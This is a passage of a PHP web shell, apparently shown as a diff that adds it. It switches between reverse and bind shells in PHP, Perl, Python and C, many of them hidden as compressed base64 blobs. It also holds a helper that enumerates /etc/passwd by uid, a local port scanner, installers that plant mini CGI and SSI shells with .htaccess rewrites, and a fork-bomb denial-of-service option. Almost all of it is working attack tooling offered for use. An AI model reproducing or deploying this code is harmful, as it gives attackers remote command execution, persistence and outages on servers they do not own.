$perlbccode.=gzinflate(base64_decode('lVVtb5pQFP7OrzgaUiChFZxNVxlmru06006MspdkWRqESyVFIHDRNq3/fedeXoTGdZkm5rw859znnPuAeUZgYg2Hi9h9INQQcvQ/uxENDUG0J9bF9cyeggnHfX1wpp+fn5/2y8RiZt9e3GBK184GWv/0tK9j5mp8PZ5MTZ3ZX6yFbYrj+fX3X9pv9GfWvPJ15mtmNyI0ow7topchAewWkW2Dz3A4mV7ZIAszQtKx56VgjoA3VnloFqeUh1hvDKUxjZkvUTeRVOFTiF2C6J6FNFVQIE7BCwiIHUPInrI4IRHIM/vrTxWknkc2vYSuHyUVrLv55Y/5i3U3taafbq2Lm1alSNeJKUmGEMQuDasG9bbQREC7IqEZzpZHieM+yFIglRjM5BHjaO4TmlI2bvYtlo1OAW81d1dekCJ/qRnkoy3sy8m0Gi3Kw7AFyddO9gCaIXjEDyLiyWISeMjSj9P2AeQxoBD4wPL/RiNQ7rCkAs9YSly528uWQdRz7gmlT3AcwXEIPRZZOtkK3r0faBqU2896bFVd3rBV/H+1VWkN/NDCwKjt9kcHWjSnN4QdlJ96s9Y3G1c7Gh1eboW6ms/fQIlJgitk94x2GkSmuGU/BH+YvjY4BAurfhCSKMaVJ4qqK2DqB3Ls+SmygOmMhMSlwKPY+8Xcx8rjmqFinCoo4gUH2Yp4Joojy5fsjrdO6nkOdfBO108gi34ar1WRxuy4j3eGsF0hDVlndy6mGwzi45USxyuRIC5z31fxXdEfoL5DJ+OKkju1mtKNAkdHuBUwTShfI0pDbSz/SmX8IBMfGHiGmjMfH9gBxq5khfu5p6uCAow4fk9ymwaUyDhJzbEJV0o9v00T+0Xkkankr3zriUvSrw7BLWc0lQsGmsqrTWAa2PFvMUhnPyafIfLjPGITF9eIveOcmlwVIG65veU24TZhNhYQdmJBrKBU9cHXvI6pxnUzyamFtPYz1CReQRlMZRo9CN0Jbhjjn0shv8Ku5FlwZSxPuH3CJzGEPw==')); + //author/license unknown + $cbdcode=gzinflate(base64_decode('bVBha8IwEP3eX3FMmOns1H2uDoo6kDEV7ZexSejaVA9rKkkUq+y/75q6Drd9CHl59y737jVQxtk+EdDTJsG8vX50Gj8UrmSU/eIK3THFTui/tM7jjTDXvBQG6XRQljxKA6TiidCeBXGGFVBxdWdCEhDqIBTfYeIBKUrgO9qofWzbN1GSKI7S6nj58OG/MrUKaSqBHb2NiGUlitSKBsbrSMEd4cPb0nXOYEXoO2muGPa7PvZKnY+tlgtnZyu2Whhm5bj0mu/HbtOjsWT5m3Rd3/m0VuNdUZHdpXdDAWgTmRuqXraHPlRpseCJjyej0IPFdPDMF+F8FLx4MJ7N5tNwysPBzKXlMAVWd/bh/sEFRxzRMEJU/jgJlTNWrePCbZ0LRYknkaesZkqH9aOtUfI02mJWkKGLkzLLK0EF7EWqtcllxsaTYDic82DySv99AQ==')); + $cbdcode.='serv_addr.sin_port = htons('.$_POST["port"].');'; + $cbdcode.="\n"; + $cbdcode.=gzinflate(base64_decode('hVJBasMwELznFVsfilRUEgd6cnNOcymF0rNxpbUtImwjKWloyd+7suzGaQjBIHtn2PHMINfK3EpYwaduFHM0KXQCmPN2Jz0QsC2UsvDA4d6h3edhEuD0N7Yl+0M4z2a6hF6A5O5WsOAww4P27DHlGfRk2dot42fkInAOfVfZjtE3DbpqCsPeN+uXjzcB9M4369ebEmMMo53H5hTk6bqxfvGr1gaBpRx+oorBhmSGfNJobHxMmPU0IUQXUmLnb9Q1WRZUXtSe2AlSz//sEJZ3WtEvKipFKxb7sXu0Ax4bGOqYMDEZhVC7bjnqi170DEkvkCV5wgNKw5I53YK5qxORhIPJughRBmetw3EnACfTxwt2dqTnFw==')); + //author/license unknown + $cbccode=gzinflate(base64_decode('XVBNawIxEL3nVwwrlESjq161BRELUqui25Msy5pku6FrIkksVfG/N7vWj3oYMvPmzZuXqUnFih0X0LeOS93KX1DtBu1taDX7Eu4/roSTPkKpSlwqB5tUKlwmqflkFFieGqj7/HsVE3SsKBnvIevMjjkoNVPOTSIVWKl6iKdioxXu0DbxJC/rI8nSjSz28AyD12Q8HUW3zlYb5/HcaWVx6rTE1apuTO7GywUtWz2eW/qt8jO1E5MeoPVBGH0BqDdXCHXtNzqNe6QSB5RxL3a+Cf7zRWE5G74ly2gxGrxTGM/ni1k0S6LhnICfkBlgzLRSgjmccQr44QpQJ/DkHVN/i4PQ2WOfENJvEziirTBGGxysmjFcBEngvyx+pMPl6U6I77bdaktZXovOfdGtJgQrcBCupQptHtDA5tCUAYXpx2Ti+6zQVnh2+eUT+gU=')); + // Copyright (C) 2007 pentestmonkey@pentestmonkey.net + $findsock=gzinflate(base64_decode('bVLbTsMwDH3vV5gioaR09zdG+QLEG0+ApqxJN4suqZIUcRH/jp11Y0yoUhIfHx87J71EW7e9NnAbPsIkuPrVxPH2Lrv8xaNGdw55tJu/mPKdmqA9ryaAQcr8xXuLJMwY2gg7hRYEn5Tf1CXUW+WLgoM3CV8ZNiA4ARcVLBjoqH9sRP4Y1MbcQINW8+iAHXTOx2eby2Vm3jGKKR2+M9aDgikrolRJ+Gn2sjxNcOEhNacUXbKvI3BOae1XNKEP6l+8ZZynD/hpSIM31wiiy6GFNzsXDTV/Wkxf9txGL7PGeRCNrhZLCm83Juqo1q3heiEZu74+3J+SnTHeqp2hihKuSJ1Wpkr2ZTRjJg1n6+5DHPuVwPavbHRKFGKYHe2KR4dCsso4DPE4pE2WsGDbuGvS23WneoOLiQRVBdPDhPx+khptgziosqeJlHIqOhRHr2Wa18SAmu6a6b6bp4tNT4PZaTBnN1sX2ID0vqZuRT5Zo5307Etewlk0UrQ+PN7fn9HD9sjdH0f4S/xO3/4XA5GP8wH7AQ==')); + //code by b374k + $pybdcode="#!".search("python",$failflag)."\n"; + $pybdcode.=gzinflate(base64_decode('jVTbahsxEH3ehf0HVS/WYmdjO+2LWxlCcUioE5fYhUIIZrOrZEU2kpHkXP6+mpF8aZxCX7zS6MycMzfLp5U2jmjbI/YNfnT1KFyPOPkksvTy9PdyOrnig/7wc5bOzyfTKafHd1Id24YcVTRLFxeXk+Xs14IPhv1+lv6cXS849fbz2TwcanFPbCPallVPdT7K0sQ2S712XNtipVdCMQzb7RDa6XpIt0M7eWFEWbdSCcty76GiC8RL7rUhkkhFTKkeBGt9hPCcY/QNuMvD90beeqsRbm0UiW9BVVk5qRWrtFLo+dLIVpCFWQuMA/bCClUzOh6PCQUhiTNv+JisvFSOECOqZxYLhRjxWomVizAjlSMUqul5KdqiFiBCeGsDYQIhacB8kCQw5keDkCSCuxxsIcEkkfcEAnA6qisaQe+oPNcOZet3qLPSK4mwjSSICuTAPe5HWwK92PU0Gnf1gl5kaWkenrmfqQIOWRoDwSX/djIi3isWRxijzVfIG9DiVTo28P6oFeA3g1uv9+gO5eKAoXV4e4gxlJSq3hGNTw59EhxNvJ5gCJ8r2bIi1sticMhRth9U345Hln/iWIGtyr5/h33hYWmK8GHxdnq2vLiaLDYrVcxn338s54vryell9PPVcnEy2GaPAuVB2gj3e1cz1ml1VbaNtq7TI6gy3wBaaZ1PHXSZteKh7WGs/R3ivC/XaDPUqLKAHorKMcKgSDE82Z9qsj/WIIKslV/WqinvWhFmF1IqbCvEin3JtxMOCnhcOeCCl+2cgYIEN7FX1rXJsaJFWQEl+6+l2iMdfEyKe35QAl9eEia3Wbtavyg2PFBGYrPgr4D+VYx/sAb8fsA/')); + //code by ont.rif + $pyintserver="#!".search("python",$failflag)."\n"; + $pyintserver.="import sys, socket, os, pty, fcntl, struct, termios, select, resource\n"; + $pyintserver.="host = \"".$_POST["ip"]."\"\n"; + $pyintserver.="port = ".$_POST["port"]."\n"; + $pyintserver.=gzinflate(base64_decode('hVT9i+IwEP29f8XcgjSFXlfXdT+EPVg8lyvnKqzCwalIL41rsCYliav+9zfpl9VdsNjGJm9m3ry81KhD1wEt6RqesoGZIB9I+fr8sgiH/Ylfvo9Hvd+L8eSt//wKXh4bUCkEoxhDVlIbH1KpjIerbE9ZarBCqrgwcAW9SLgGCvi3mbhyQOpgwfYcg1sYYTJCfGmnl1KtiQc/oNmtoZq26iVAXhhG475SUvnA7FDxcMFGdqERA2lobyZcaADJQQE+hSwiAm1U9gdTYoF4m97kugRLnjAhiYeyHDTCYi6qObiMlltzhF9EI4U6uhSzoWcKnxnqgynNpXBSHvtAVzyJF8sY9zQ1h0ImBzUT0gAiuuBALjRMwlFv/Cccjv8i+J2ZyBhFDFMbLrUP7nHZ9eH7Tev27vHmsXPXwi2we1CPfgJcfmi27+/bnYFNfZq7Foxr2trNqC01QRrRNXF/4YUlbps+POBtf7bGkgqTBFxSk5CvtPNrRVAua43Kc5BGWjuwifa5FIppuVWUBdimSvgGvVJNvQ3C13CyGI5ewkHfmzbnjrUIcOACVCTeGYG2X6bybPJCP+s7mkjNgHBL+NR4GSKngTi2Z/SDgHv9j4trvcJ2p647R8473C8GE7VlGIBu3aH9rEAswVMS5AOBabWv/qlPYI6ZirtTnI7KAraBOl9sGVMjG8WimNRStpr2suFZUzvFDftkSBt9bDNvL3fjT44SZNnA8A0D3CUP7VlkOzu7p/RLimfUzkq3SnZHckfyJa/C4/j6iRvb4FkoPmJfM/sP')); + switch ($_POST["shellz"]) { + case "phpremote": + // code by pentestmonkey.net. license: GPLv2 + $ip=($_POST["ip"]); + $port=($_POST["port"]); + $chunk_size=1400; + $write_a=null; + $error_a=null; + $shell='/bin/sh -i'; + $daemon = 0; + function printit ($string) { if (!$daemon) { print "$string\n"; }} + if (function_exists('pcntl_fork')) { + $pid = pcntl_fork(); + if ($pid == -1) { printit("ERROR: Can't fork
"); exit(1); } + if ($pid) { exit(0); } + if (posix_setsid() == -1) { printit("Error: Can't setsid()
"); exit(1); } + $daemon = 1; + } else { printit("WARNING: Failed to daemonise!
"); } + umask(0); + $sock = fsockopen($ip, $port, $errno, $errstr, 30); + if (!$sock) { printit("$errstr ($errno)"); exit(1); } + $process = proc_open($shell, $descriptorspec, $pipes); + if (!is_resource($process)) { printit("ERROR: Can't spawn shell
"); exit(1); } + stream_set_blocking($pipes[0], 0); + stream_set_blocking($pipes[1], 0); + stream_set_blocking($pipes[2], 0); + stream_set_blocking($sock, 0); + printit("Successfully opened reverse shell to $ip:$port
"); + while (1) { + if (feof($sock)) { printit("ERROR: Shell connection terminated
"); break; } + if (feof($pipes[1])) { printit("ERROR: Shell process terminated
"); break; } + $read_a = array($sock, $pipes[1], $pipes[2]); + $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); + if (in_array($sock, $read_a)) { + $input = fread($sock, $chunk_size); + fwrite($pipes[0], $input); + } + if (in_array($pipes[1], $read_a)) { + $input = fread($pipes[1], $chunk_size); + fwrite($sock, $input); + } + if (in_array($pipes[2], $read_a)) { + $input = fread($pipes[2], $chunk_size); + fwrite($sock, $input); + } + } + fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);@proc_close($process); + //php backconnect end + break; + case "phplocal": + // code by metasploit.com. license unknown, assuming BSD + $port=$_POST["port"]; + $scl='socket_create_listen'; + if (function_enabled($scl)) { + $sock=@$scl($port); + } else { + $sock=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP); + $ret=@socket_bind($sock,0,$port); + $ret=@socket_listen($sock,5); + } + $msgsock=@socket_accept($sock); + @socket_close($sock); + while (FALSE !== @socket_select($r=array($msgsock), $w=NULL, $e=NULL, NULL)) { + $buffer = ''; + $c=@socket_read($msgsock,2048,PHP_NORMAL_READ); + if (FALSE === $c) { break; } + if (substr($c,0,3) == 'cd ') { + chdir(substr($c,3,-1)); + } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') { + break; + } else { + if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) { $c=$c." 2>&1\n"; } + if (function_enabled('shell_exec')) { + $buffer=shell_exec($c); + } else if(function_enabled('passthru')) { + ob_start(); + passthru($c); + $buffer=ob_get_contents(); + ob_end_clean(); + } else if(function_enabled('system')) { + ob_start(); + system($c); + $buffer=ob_get_contents(); + ob_end_clean(); + } else if(function_enabled('exec')) { + $buffer=array(); + exec($c,$buffer); + $buffer=join(chr(10),$buffer).chr(10); + } else if(function_enabled('proc_open')) { + $handle=proc_open($c,array(array(pipe,'r'),array(pipe,'w'),array(pipe,'w')),$pipes); + $buffer=NULL; + while (!feof($pipes[1])) { + $buffer.=fread($pipes[1],1024); + } + @proc_close($handle); + } else if(function_enabled('popen')) { + $fp=popen($c,'r'); + $buffer=NULL; + if (is_resource($fp)) { + while (!feof($fp)) { + $buffer.=fread($fp,1024); + } + } + @pclose($fp); + } + else { $buffer=0; } + } + @socket_write($msgsock,$buffer,strlen($buffer)); + } + @socket_close($msgsock); + echo "

phplocal done"; + break; + //phpbind end + case "perllocal": + $exec_path = trim($_POST['path']); + ob_start(); + @sploent516(); + ob_end_clean(); + $fh=fopen($exec_path,'w'); + if (!$fh) { echo "

can`t fopen!"; } + else { + fwrite($fh,$perlbdcode); + fclose($fh); + chmod($exec_path,0644); + $c=search("perl",$failflag).' '.$exec_path.' && rm -f '.$exec_path.''; + run($c); + echo "

perllocal done"; + } + //perl bind end + break; + case "perlremote": + $exec_path=trim($_POST['path']); + ob_start(); + @sploent516(); + ob_end_clean(); + $fh=fopen($exec_path,'w'); + if (!$fh) { echo "

can`t fopen!"; } + else { + fwrite($fh,$perlbccode); + fclose($fh); + chmod($exec_path,0644); + $c=search("perl",$failflag).' '.$exec_path.' '.$_POST["ip"].' '.$_POST["port"].' && rm -f '.$exec_path.''; + run($c); + echo "

perlremote done"; + } + break; + //perl backconnect end + case "pylocal": + $exec_path = trim($_POST['path']); + ob_start(); + @sploent516(); + ob_end_clean(); + $fh=fopen($exec_path,'w'); + if (!$fh) { echo "

can`t fopen!"; } + else { + fwrite($fh,$pybdcode); + fclose($fh); + chmod($exec_path,0644); + $c=search("python",$failflag).' '.$exec_path.' -b '.$_POST["port"].' && rm -f '.$exec_path.''; + run($c); + echo "

pylocal done"; + } + //python bind end + case "pyremote": + $exec_path=trim($_POST['path']); + ob_start(); + @sploent516(); + ob_end_clean(); + $fh=fopen($exec_path,'w'); + if (!$fh) { echo "

can`t fopen!"; } + else { + fwrite($fh,$pybdcode); + fclose($fh); + chmod($exec_path,0644); + $c=search("python",$failflag).' '.$exec_path.' -r '.$_POST["port"].' '.$_POST["ip"].' && rm -f '.$exec_path.''; + run($c); + echo "

pyremote done"; + } + break; + //python backconnect end + case "pyint": + $exec_path=trim($_POST['path']); + ob_start(); + @sploent516(); + ob_end_clean(); + $fh=fopen($exec_path,'w'); + if (!$fh) { echo "

can`t fopen!"; } + else { + fwrite($fh,$pyintserver); + fclose($fh); + chmod($exec_path,0644); + $c=search("python",$failflag).' '.$exec_path.' && rm -f '.$exec_path.''; + run($c); + echo "

pyint done"; + } + break; + //python interactive end + case "clocal": + $exec_path=trim($_POST['path']); + ob_start(); + @sploent516(); + ob_end_clean(); + $fh=fopen($exec_path,"w"); + if (!$fh) { echo "

can`t fopen!"; } + else { + fwrite($fh,$cbdcode); + fclose($fh); + $c=search("gcc",$failflag)." -w ".$exec_path." -o ".$exec_path." && ".$exec_path." ".$_POST["port"]." | rm -f ".$exec_path.""; + run($c); + echo "

clocal done"; + } + break; + //C bind end + case "cremote": + $exec_path=trim($_POST['path']); + ob_start(); + @sploent516(); + ob_end_clean(); + $fh=fopen($exec_path,"w"); + if (!$fh) { echo "

can`t fopen!"; } + else { + fwrite($fh,$cbccode); + fclose($fh); + $c=search("gcc",$failflag)." ".$exec_path." -o ".$exec_path." && ".$exec_path." ".$_POST["ip"]." ".$_POST["port"]." | rm -f ".$exec_path.""; + run($c); + } + break; + case "findsock": + $fs_path=trim($_POST['path']); + ob_start(); + @sploent516(); + ob_end_clean(); + $fh=fopen($fs_path.".c","w"); + if (!$fh) { echo "

can`t fopen!"; } + else { + fwrite($fh,$findsock); + fclose($fh); + $c=search("gcc",$failflag)." ".$fs_path.".c -o ".$fs_path." && rm -f ".$fs_path.".c"; + run($c); + echo "
compiled, now connect to shell via nc and request ?pfs&path=".$fs_path."
"; + } + break; + } + } + echo $pageend; + break; +// --------------------------------------------- bind end; extras + case "e": + if (empty($_POST["extraz"]) and $download != "1") { + echo $title; + echo '---> SysInfo
'; + echo '
>> show << +

"; + echo '---> Extraz

'; + if (!function_enabled('phpinfo')) { echo "fail, phpinfo() is disabled

"; + } else { + echo '

'; + } + if(function_enabled('posix_getpwuid')) { + echo '
"read" /etc/passwd from uid to
'; + if (!empty($_POST["uidz"])) { + echo "
"; + //code by oRb + for(;$_POST['uid1'] <= $_POST['uid2'];$_POST['uid1']++) { + $uid = @posix_getpwuid($_POST['uid1']); + if ($uid) + echo join(':',$uid)."
\n"; + } + } + } + echo "
"; + if(function_enabled('fsockopen')) { + echo '
"scan" local open ports from to
'; + if (!empty($_POST["portz"])) { + for($i=$_POST["port1"]; $i <= $_POST["port2"]; $i++) + { + $fp=@fsockopen("127.0.0.1", $i, $errno, $errstr, 1); + if ($fp) { + echo "-> ".$i."
"; + fclose($fp); + } + } + } + } + echo '
>> minishells help << + '; + if (file_exists(".htaccess")) { + echo '
WARNING: my .htaccess will rewrite current one!'; + } + echo '
put mini perl shell into / adding .htaccess '; + if (is_writable("./")) { + echo "(./ writable)"; + } else { + echo "(./ readonly)"; + } + echo '
'; + if ($failflag=="1") { + echo "can't find perl binary (all system functions disabled) assuming /usr/bin/perl
"; + } + echo '
put mini python shell into / adding .htaccess '; + if (is_writable("./")) { + echo "(./ writable)"; + } else { + echo "(./ readonly)"; + } + echo '
'; + if ($failflag=="1") { + echo "can't find python binary (all system functions disabled) assuming /usr/bin/python
"; + } + echo '
put mini SSI shell into / adding .htaccess '; + if (is_writable("./")) { + echo "(./ writable)"; + } else { + echo "(./ readonly)"; + } + echo '
'; + echo '
'; + //code by Eric A. Meyer, license CC BY-SA + echo ''; + echo "---> Text encoderz/decoderz

"; + echo "fast URL-encoder:
"; + echo '
'; + echo "
other encoders: "; + $cryptform="
+ +
+ salt: (salt needed for: md5(unix,wordpress,phpbb3,apr1) - 8 symbols, sha(256,512) - 16 symbols, and blowfish - 22 symbols. ignore these fields if you use other algorithms)
+ +
"; + echo $cryptform; + if(isset($_POST['crypt'])) { + $text=$_POST['text']; + if($text == '') { + die("

empty form

\n".$pageend.""); + } + $hash=$_POST['hash']; + $hash1=$_POST['hash1']; + $hash2=$_POST['hash2']; + echo("-->

"); + } + //decoders end + echo '

---> DoS //use this carefully

'; + echo '
'; + echo $pageend; + } + if (!empty($_POST["extraz"])) { + switch ($_POST["extraz"]) { + case "fork": + while(pcntl_fork()|1); + break; + case "pysh": + //code by Michael Foord & 12309, license WTFPL + if ($failflag=="1") { + $pybin="/usr/bin/python"; + } else { + $pybin=search("python",$failflag); + } + $pyshcode='#!'.$pybin; + $pyshcode.="\n"; + $pyshcode.=gzinflate(base64_decode("bVRRT9swEH7Pr7jlpa0IKWObtLGmUoEClWBFbR82QRW5idNaS+LIdqBl2n/fnZ10BfGU3N33fXc+n8+o3ZkHoqikMpCshVl9d5+Ql2yV827P49uEVwZRFdPaa6B6pwMCBiC1h0aoTcqVgggaQ9bGy5QswIiCtwm0URnZrYpRLOErlvx20LlRolxPpi28tRuhFtyGK4yaGMvzRIZlYMVPQsky3DAd/+a7rj+/mE3uF/GP0d3Y7+EBdKJEZUqGBUUHhIdXwKXHc83fon3fS3kGa24yqYruE8trngttAjAbTq4ASmkqxTUvTdTpULqUGYbUP389QARkgucpiBL2ZMQAlo7EVmVfuwWTCFiZB2svUe1/Fow1lVoVMLuKdxudBt+DD5HzPyyd2Bu11/DQVkawvbArViO0YFU3Z8UqZbA9g63DBm8Ueu/kcAoeKG5qVdqg17A2nKW2uf7gZnF3OxzcjEeXw8FisrgdD9ELR4e3cERAOAYGF9cTWO3gqn552RWsDKCuUJan5Px4+unk26DvNAZ9p3g+vfxFgt5KpjteUtLOoG+9CKHUHQ/HF0viWtvg+XAuC242OIDwjN2GZ5yUNXJQbDYc3M/GSMG2xzHVFscQISuOCybKOO7Qa6HpBP9Clgbpx3QLZ2D41vQ3psj9BmBHo8CM+JbCK2rZ3EjF1vTw2gFqh+6hkxRpZxmQgVHsIdoYt+12sTbtQX+91mgafTWd3cHdeHEzvYwe/fvpfPHoA0uMkGX0fsuHA1FWtQHyIAUTIYPOgwYdCC0tXsj6fPLou/44RgPS9aoQBLOjgI5r2eL6VI69mdeVezTS7oQ0hy5Gt9IJGndgb9CpLMY/F6PZeASJzHXkfz3xQcln/Dv94uM14duwaw4g2Yg8jXE9CRyavYG7yi2ESla8PO26BL03hDDJpbb3AjjLus6JdKgRKmx39zWN3Ac8dw7HpvdrVyuM7QcvIAD36hxsP5DkyjBZuw8PtGj94bLIeZRZJ81LFuLE2FZ3e6GucmFyUXLtWLSJyKRFxNwTd9nIedDpfttT6p9zNm/H+wc=")); + $htaccess=$htaccesses['cgi']; + if (strnatcmp(version(),"5.2.9") <= 0) { + sploent516(); + } + $fh=fopen($_POST["dir"]."/".$_POST["file"],"w"); + if (!$fh) { echo "can`t fopen ".$_POST["dir"]."/".$_POST["file"]."!"; } + else { + fwrite($fh,$pyshcode); + fclose($fh); + echo $_POST["file"]." write done, chmoding..
"; + $ch=chmod($_POST["dir"]."/".$_POST["file"], 0755); + if (!$ch) { + echo "chmod failed, make chmod 755 manually
"; + } else { + echo "chmod done
"; + } + if ($_POST["htaccess"] == "on") { + $fh=fopen($_POST["dir"]."/.htaccess","w"); + fwrite($fh,$htaccess); + fclose($fh); + echo "htaccess done"; + } + } + break; + case "perlsh": + //author/license unknown + if ($failflag=="1") { + $perlbin="/usr/bin/perl"; + } else { + $perlbin=search("perl",$failflag); + } + $perlshcode='#!'.$perlbin; + $perlshcode.="\n"; + $perlshcode.=gzinflate(base64_decode("TVFLTwIxEL73V4wNMSXZFdSYGBY2QQ7E+DioRxKtu7PSpNuubRdQ5L87XYR4m3bme8w3rUeYzW/hcz1IjX3dLEOtYeSDNKV05SBj7X5gNJpJ19CYqGSQ2r/YG2fXHl0/Y41TJsASZYlOpMVSOo8BJjnwNlTpNe8njAhdeI3kItXSfHRd1/IE0qCCxu7NiUtVIKCRTtaiD33YsvoLeiuY/P3xFT8K9lYJ8PG7yxeGZ91cUDXalqThcpgxbQupofd8O99O758edvTt23fYQqEtLXU3fTwwcSCCUiHwPwaewS5jvUaVBLINGkHTpEZOLvLTc/iJLjpAIc0bWTk5IxPQGo3eg4hAGsAV6W+Z1NLV4mDuaL+zPg64oWhQQmG1nyz49XDBISZL9cXVgufkbL1UGgWMyUMeM4GOgCwemQYHmjySEmSvOSSxf8vu2AGxP0dlXZ2wCK0U6lKkRtY4ySljOotX31RTkFTTHi3uL5TEDGsVBJ/beFg0ZUcDVHT3pbU31I7Svw==")); + $htaccess=$htaccesses['cgi']; + if (strnatcmp(version(),"5.2.9") <= 0) { + sploent516(); + } + $fh=fopen($_POST["dir"]."/".$_POST["file"],"w"); + if (!$fh) { echo "can`t fopen ".$_POST["dir"]."/".$_POST["file"]."!"; } + else { + fwrite($fh,$perlshcode); + fclose($fh); + echo $_POST["file"]." write done, chmoding..
"; + $ch=chmod($_POST["dir"]."/".$_POST["file"], 0755); + if (!$ch) { + echo "chmod failed, make chmod 755 manually
"; + } else { + echo "chmod done
"; + } + if ($_POST["htaccess"] == "on") { + $fh=fopen($_POST["dir"]."/.htaccess","w"); + fwrite($fh,$htaccess); + fclose($fh); + echo "htaccess done"; + } + } + break; + case "ssish": + // code by profexer + $ssishcode=gzinflate(base64_decode("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")); + $htaccess=$htaccesses['ssi']; + if (strnatcmp(version(),"5.2.9") <= 0) { + sploent516(); + } + $fh=fopen($_POST["dir"]."/".$_POST["file"],"w"); + if (!$fh) { echo "can`t fopen ".$_POST["dir"]."/".$_POST["file"]."!"; } + else { + fwrite($fh,$ssishcode); + fclose($fh); + echo $_POST["file"]." write done
"; + if ($_POST["htaccess"] == "on") { + $fh=fopen($_POST["dir"]."/.htaccess","w"); + fwrite($fh,$htaccess); + fclose($fh); + echo "htaccess done"; + } + } + break; + } + } + break; +// extras end ### + case "pi": + phpinfo(); + break; +} +// :) +?>